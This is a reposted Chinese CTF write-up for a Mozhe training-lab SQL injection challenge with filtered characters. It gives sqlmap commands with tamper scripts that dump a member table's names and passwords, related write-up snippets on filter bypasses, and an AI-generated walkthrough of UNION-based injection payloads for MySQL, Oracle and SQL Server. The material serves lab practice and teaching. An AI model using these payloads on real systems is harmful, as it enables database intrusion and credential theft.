SQL过滤字符后手工注入漏洞测试(第1题)

最新推荐文章于 2025-05-16 00:15:32 发布
转载 最新推荐文章于 2025-05-16 00:15:32 发布 · 171 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/hack404/p/10755300.html

本文详细介绍了一种特殊的时间盲注技巧,通过使用sqlmap工具进行自动化注入,演示了如何获取数据库信息、表结构和具体数据。从设置URL到获取flag,提供了完整的操作流程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

 

分析题目,属于时间盲注,这种情况,通常使用sqlmap 直接注入就行了,手动语法太复杂了!!!

 

sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --current-db

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables

 

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password,status --dump

 

 登录后台,获取flag,提交即可

 

转载于:https://www.cnblogs.com/hack404/p/10755300.html

墨者学院SQL过滤字符手工注入漏洞测试(1)
痴人说梦梦中人
11-13 366
1、 我也没想到那么多弯弯绕绕的,看到评论区有提示,就照做了,编写url编码脚本,获取注入payload,测试回显位置。 #!/usr/bin/env python # -*- coding:UTF-8 -*- #time:2019/11/9 1:03 #author:White9527 from urllib import parse import re #查询语句 s1 = """ord...
墨者_SQL过滤字符手工注入漏洞测试(第3)
weixin_50698958的博客
10-12 475
靶场: https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习搭建一个采购系统,为了安全起见,“墨者”对该系统做了部分防护措施,请你帮助他测试系统是否安全。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解MySQL的数据结构; 4、了解SQL注入常用注释字符; 5、了解sql注入常用绕过姿势; 解方向 手工进行SQL注入测试
墨者靶场-SQL过滤字符手工注入漏洞测试(1)
shy的博客
11-15 391
墨者学习 By/shy014 进去首页又看到熟悉的公告 通过简单的测试,确定存在sql注入漏洞,但是输入and 1=1 ,and 1=2,order by,union select ,and都没...
笔记:SQL过滤字符手工注入漏洞测试(1)
m0_67399862的博客
05-26 603
一打开网页时,发现正常打and 1=1的语句都被过滤了 考虑空格被过滤 将空格用/**/表示转换为URL时,发现语句仍报错,考虑有可能是等号被过滤 将=用like表示转换为URL 相当于输入了and 1=1的语句,页面正常 相当于输入了and 1=2的语句,发现页面报错,说明有SQL注入 用order by语句查询字段数 说明字段数只有4个 发现语句没有拼接在一起 将id=1改为id=-1 接下来按常规的爆库,爆表,...
墨者-SQL过滤字符手工注入漏洞测试(1)
zr1213159840的博客
12-10 913
和以前的简单目一样,看目的提示以及自己的测试知道过滤了=,–+,空格符号。等于可以使用like进行替代,空格可以使用/**/进行替代。最主要的,感觉目给了误解,没有说准确,目说url加密,但是经过测试直接选在网上选择url加密的链接并不行,最后测试是url网址16进制加密才可以,链接如下 url16进制加密 下面开始正式步骤: 首先是测试是否存在注入,将id=1改成id=2,没得显示,可能存在漏洞。 然后我们再测试下id=1 and 1=1和and 1=2行不行,需要注意的是,需要对空格以及=进
CTF-SQL过滤字符手工注入漏洞测试(1)
asd158923328的博客
08-21 1076
根据SQL注入原理:SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 进入环境,加’ 和 -1 1+0页面发生变化,返回页面不存在,或者显错,存在注入点 进一步发现,空格和‘=’也被过滤掉了 所以‘=’可以用Like 替...
记一篇墨者学院SQL手工注入漏洞测试(MySQL数据库)write up
2403_87248548的博客
05-16 1158
最后再把整体的一个思维导图放下面给大家看一下吧!我把整个流程一次从左到右依次列了出来希望对大家有所帮助!
墨者学院—SQL过滤字符手工注入漏洞测试
没事我溜达
03-16 1317
靶场地址: SQL过滤字符手工注入漏洞测试(1)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话,那我们也算是过了入门这个关了。 今天来学习墨者学院中的字符过滤靶场 我们打开靶场 我们进到靶场看到一个登录页面 看到这我也是很激动呀,打开BP就是一顿爆破,结果没爆破出来.. 然后仔细看到下方有个导航条我我们点进去 注意看这个URL,我就怀疑注入点在这里,然后打开.
360众测靶场库之64- SQL过滤字符手工注入漏洞测试(1)
zjl12344的博客
03-11 318
360众测靶场
SQL注入漏洞测试
09-12
SQL注入漏洞测试入门篇
0x2F.SQL过滤字符手工注入漏洞测试(1)
qq_31679787的博客
11-14 1185
经过测试,发现空格,符号等都被过滤,所以通过替换被过滤的符号并且进行url编码后才能继续注入; 测试列数; /**/order/**/by/**/5# %2f%2a%2a%2f%6f%72%64%65%72%2f%2a%2a%2f%62%79%2f%2a%2a%2f%35%23 以下级联查询需将id=1改为id=-1,才能显示级联后的查询内容; 测试显位点; /**/union/*...
墨者 - SQL过滤字符手工注入漏洞测试(1)
吃肉唐僧的博客
07-04 1406
一开始使用order by,union select ,and 字段,发现返回并没有变化。 推测这些字段是已经过滤掉了 后来,上网查询后发现 ,不但这些字段过滤,还有空格和‘=’也被过滤掉了 所以‘=’可以用Like 替代,空格用/**/,url 要编码转义 在这里有个坑,花了我不少时间 一般url都是用在线url解码,例如:https://tool.chinaz.com/tool...
墨者学院-SQL过滤字符手工注入漏洞测试(1)
weixin_38131137的博客
03-01 190
一试验就清楚是被过滤了,在这里有几点提示的 1、如果是空格、=的过滤,用/**/ 与 like替换 2、这里里面有坑,百度后才发现,url编码存在简单模式和复杂模式 3、下载个小葵,或者用编码网站http://web.chacuo.net/charseturlencode 4、后续发现再补 ...
墨者靶场 初级:SQL过滤字符手工注入漏洞测试
qq_43233085的博客
01-13 549
墨者靶场 初级:SQL过滤字符手工注入漏洞测试目背景介绍实训目标解方向解步骤 目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Apache+PHP+MySQL,PHP代码对客户端提交的参数做了些许过滤。来感受过滤过后的SQL手工注入吧。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解字符串的URL加解密; 4、了解SQL注入...
墨者SQL过滤字符手工注入漏洞测试(1)
wswr的博客
03-12 2019
思路:注入嘛,那就是该试的都试试,然后你会发现单引号页面跳转了虽然没有和之前一样有sql报错什么的,而且空格order,by ,select什么的字符都被过滤 那么就是要用url编码的方式去绕过滤,值得注意的是空格用/**/代替,=用like代替 简单说就是和正常注入的不同的地方就是每一步注入的代码都要换成url编码的形式再去注入,然后就和正常注入没什么区别了 ps:这里其实一开始我也没什么思路的QAQ,然后就无脑sqlmap了,后面会发现sqlmap抛出来的账号密码都不行,所以还是得手注可恶 总结
墨者 - SQL过滤字符手工注入漏洞测试(第2)
吃肉唐僧的博客
07-11 679
一开始直接用order by 测试,被拦截 后来试着绕过,空格用/**/代替,=用like代替 可以绕过,成功执行 测试到字段有4个,用union select 1,2,3,4 发现被拦截无法执行,猜想是拦截了关键字,试着把关键字段得某个字母转编码 /**/and/**/1/**/like/**/2/**/%75nion/**/%73elect/**/1,2,3,4 执行成功 ...
墨者学院—SQL过滤字符手工注入漏洞测试(第3)
没事我溜达
03-20 3155
靶场地址:SQL过滤字符手工注入漏洞测试(第3)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 我们进入靶场(这次总算是不一样的了) 首先判断注入 我们在后面加入一个单引号,发现页面报错 能做到这个靶场的都不是新手,我就不说为什么报错了,我们在后面加上注释符,即可完成闭合,使得页面显示正常 然后order by判断列数,在第8列页面不回显,那么判断数据库有7列数据 判断回显位置 查询数据库名 http://1...
墨者学院----SQL过滤字符手工注入漏洞测试(1)
qq_43590351的博客
01-22 581
SQL过滤字符手工注入漏洞测试(1) 按照基本流程我们在url中输入单引号报错,说明存在SQL注入,但是在输入order by union select发现页面 保持正常,有可能我们输入的字符过滤 过滤的"="号可以利用like代替,空格用==/**/==代替 判断字段数 /**/order/**/by/**/4 介绍一个在线的url编码解码网站 http://web.chacuo.net/charseturlencode 由于被过滤所以我们要进行url的编码。%2f%2a%2a%2f%6f%7
3SQL Inject漏洞手工测试:基于union联合查询的 信息获取(select)详细步骤
最新发布
06-20
<think>我们正在讨论基于UNION联合查询的SQL注入漏洞手工测试步骤。用户特别关注如何通过UNIONSELECT获取信息。结合提供的引用内容,我将整理出详细步骤。注意:不同数据库(如Oracle、MySQLSQLServer)的语法有差异,但基本思路一致。这里以MySQL为例(引用[2][3]),并参考其他数据库(引用[1][4])的类似操作。步骤概述:1.寻找注入点2.确定字段数(使用ORDERBY)3.确定回显位置4.获取数据库信息(如数据库名、版本等)5.获取表名6.获取列名7.提取数据详细步骤:1.**寻找注入点**:通常在URL参数、表单输入等位置尝试注入。例如,在URL中,参数`id`可能存在注入:`http://example.com/page.php?id=1`测试方法:添加单引号`'`,观察是否报错(如SQL语法错误),或使用`and1=1`、`and1=2`测试页面返回是否不同。2.**确定字段数(列数)**:使用`ORDERBY`子句,通过二分法逐步试探列数。示例:`http://example.com/page.php?id=1orderby5--`如果`orderby5`时页面正常,而`orderby6`时出现错误,则说明有5列。注释符:MySQL使用`--`(注意有一个空格)或`#`,Oracle和SQLServer也使用`--`。3.**确定回显位置**:使用`UNIONSELECT`,并将原查询条件设为不存在的值(如负数或超出范围),使得原查询结果为空,从而显示我们联合查询的结果。示例:`http://example.com/page.php?id=-1unionselect1,2,3,4,5--`注意:字段数必须与前面确定的列数一致。观察页面中显示的数字(如2,3,4)即为回显位置。4.**获取数据库信息**:在回显位置替换为想要查询的信息。例如:-当前数据库名:`database()`-数据库版本:`version()`-当前用户:`user()`示例:`http://example.com/page.php?id=-1unionselect1,database(),version(),user(),5--`注意:将回显位置(如第2,3,4位)替换为这些函数。5.**获取表名**:通过查询系统表(如MySQL的`information_schema.tables`)获取表名。示例:`http://example.com/page.php?id=-1unionselect1,table_name,3,4,5frominformation_schema.tableswheretable_schema=database()limit0,1--`说明:-`table_schema=database()`:当前数据库-`limit0,1`:取第一条记录,通过改变0,1可以遍历所有表6.**获取列名**:通过查询系统表(如MySQL的`information_schema.columns`)获取列名。示例:`http://example.com/page.php?id=-1unionselect1,column_name,3,4,5frominformation_schema.columnswheretable_schema=database()andtable_name='表名'limit0,1--`注意:将`表名`替换为实际表名(通常需要先获取到表名)。7.**提取数据**:根据获取的表名和列名,构造查询提取数据。示例:`http://example.com/page.php?id=-1unionselect1,列名1,列名2,4,5from表名limit0,1--`注意事项:-字符串值需要用单引号括起来,但有时需要避免引号(如使用十六进制编码表名)。-注释符的使用:确保原查询的后续部分被注释掉。-不同数据库的系统表不同:*MySQL:`information_schema.tables`和`information_schema.columns`*Oracle:`all_tables`和`all_tab_columns`(引用[1]中使用了`sys.v_$version`获取版本)*SQLServer:`sysobjects`和`syscolumns`(引用[4]中使用了`mozhe_db_v2.dbo.sysobjects`)下面提供针对不同数据库的获取表名的示例:**Oracle**(引用[1]):获取表名:`http://example.com/new_list.php?id=-1unionselect'null',(selecttable_namefromuser_tableswhererownum=1)fromdual`**SQLServer**(引用[4]):获取表名:`http://example.com/new_list.asp?id=-2unionallselect1,(selecttop1namefrommozhe_db_v2.dbo.sysobjectswherextype='U'),'3',4`生成相关问1.如何防止UNION联合查询的SQL注入攻击?2.在不同数据库(MySQL、Oracle、SQLServer)中,UNION注入的语法有哪些主要区别?3.如果页面没有明显的回显位置,如何进行UNION注入?</think>以下是基于UNION联合查询的SQL注入漏洞手工测试的详细步骤,结合Oracle/MySQL/SQL Server数据库特性整理: ### 步骤概览 1. **寻找注入点** 在URL参数或表单输入中测试特殊字符(如`'`、`"`)是否引发数据库报错。 *示例*:`http://site.com/news.php?id=1'` 观察是否出现SQL错误[^2][^3] 2. **确定字段数** 使用`ORDER BY`二分法探测列数: ```sql http://site.com/news?id=1 ORDER BY 5-- ``` 逐步增加数字直到页面报错(如`ORDER BY 6`报错则字段数为5)[^3] 3. **定位回显位** 通过UNION注入数字占位符,观察页面显示位置: ```sql -- MySQL示例 http://site.com/news?id=-1 UNION SELECT 1,2,3,4,5-- ``` 页面显示的数字位置即为可回显数据的列[^3] 4. **获取数据库信息** 在回显位替换关键函数: ```sql -- 获取数据库版本(Oracle) http://site.com/news?id=-1 UNION SELECT null,(SELECT banner FROM v$version WHERE rownum=1),null FROM dual-- -- 获取当前库名(MySQL) http://site.com/news?id=-1 UNION SELECT 1,database(),3,4,5-- ``` [^1][^3] 5. **枚举表名** 查询系统表获取目标表名: ```sql -- MySQL http://site.com/news?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1-- -- SQL Server http://site.com/news?id=-2 UNION SELECT 1,(SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),3,4-- ``` [^3][^4] 6. **枚举列名** 根据表名获取字段: ```sql -- MySQL http://site.com/news?id=-1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='users' LIMIT 0,1-- ``` 7. **提取数据** 构造最终查询: ```sql -- 获取管理员密码(MySQL) http://site.com/news?id=-1 UNION SELECT 1,username,password,4 FROM users LIMIT 0,1-- ``` ### 关键技巧 1. **绕过过滤** - 使用`/**/`代替空格:`UNION/**/SELECT` - 十六进制编码表名:`table_name=0x7573657273`(users的hex) 2. **多结果遍历** 修改`LIMIT 1,1`/`TOP 2`逐条获取数据 3. **错误处理** - Oracle需注意`FROM dual` - SQL Server需用`ALL`规避类型校验[^4] ### 防御建议 - 使用参数化查询 - 最小化数据库权限 - 过滤`UNION`、`INFORMATION_SCHEMA`等关键词
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值